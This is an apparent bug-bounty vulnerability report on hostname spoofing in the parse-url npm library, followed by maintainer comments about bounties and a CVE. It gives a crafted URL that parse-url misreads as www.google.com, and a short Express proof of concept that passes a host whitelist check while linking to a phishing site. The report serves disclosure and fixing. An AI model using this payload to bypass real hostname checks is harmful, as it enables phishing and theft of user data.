Hostname Spoofing in ionicabizau/parse-url
Reported on
Aug 7th 2022
Description
parse-url parses following http(s) url incorrectly, identifies its protocol as ssh, and its host name is parsed incorrectly either.
https://www.google.com:x@fakesite.com:x
# node -e 'const parseUrl=require("parse-url");console.log(parseUrl("https://www.google.com:x@fakesite.com:x"))'
{
protocols: [ 'ssh' ],
protocol: 'ssh',
port: '',
resource: 'www.google.com',
host: 'www.google.com',
user: 'git',
password: '',
pathname: '/x',
hash: '',
search: '',
href: 'https://www.google.com:x@fakesite.com:x',
query: {},
parse_failed: false
}
But url library parses correctly.
# node -e 'const url=require("url");console.log(url.parse("https://www.google.com:x@fakesite.com:x"))'
Url {
protocol: 'https:',
slashes: true,
auth: 'www.google.com:x',
host: 'fakesite.com',
port: null,
hostname: 'fakesite.com',
hash: null,
search: null,
query: null,
pathname: '/:x',
path: '/:x',
href: 'https://www.google.com:x@fakesite.com/:x'
}
This may lead to bypass the hostname whitelist,attacker could do phishing attack.
Proof of Concept
Consider the following attack scenario, developer uses parse-url library to check whether url hostname is www.google.com or not, and uses url library to do redirect action.
If attacker constructs malformed url, then the user will be redirected to a phishing site.
// PoC.js
const parseUrl = require("parse-url");
const Url = require("url");
const express = require('express');
const app = express();
var url = "https://www.google.com:x@fakesite.com:x";
parsed = parseUrl(url);
console.log("[*]`parse-url` output: ")
console.log(parsed);
parsed2 = Url.parse(url);
console.log("[*]`url` output: ")
console.log(parsed2)
app.get('/', (req, res) => {
if (parsed.host == "www.google.com") {
res.send("<a href=\'" + parsed2.href + "\'>CLICK ME!</a>")
}
})
app.listen(8888,"0.0.0.0");
Impact
This leads to bypass the hostname whitelist,attacker could do phishing attack and steal sensitive information.
Thank you for this finding!
@Automne Not sure why the disclosure bounty got reset to $0... Thank you very much for this finding.
@admin, what's wrong with the disclosure bounty? why it displays as $0 there...
As mentioned by Adam over e-mail, the bounties were withdrawn for this project prior to the vulnerability being deemed valid. We’re hoping to post new bounties soon.
@admin Why were the bounties withdrawn for this project? After the call with one of the members of the Huntr staff (couple of months ago), I was encouraged to keep the project as active as possible and I tried that...
Hi Ionică Bizău, rest assured that is not a reflection on you or the project. We're currently renegotiating terms with the organisation that was sponsoring your project, and so hopefully will be able to fund more security maintenance in the near future.
@ionicabizau - are you happy for us to assign and publish a CVE for this report?
The researcher has requested one :)
@JamieSlome Sure, that works!
If I am not wrong the bounty reset to 0 when I changed the Severity from High (7.3) to Critical (9.4). I am wondering now if it would have been resetting without that change...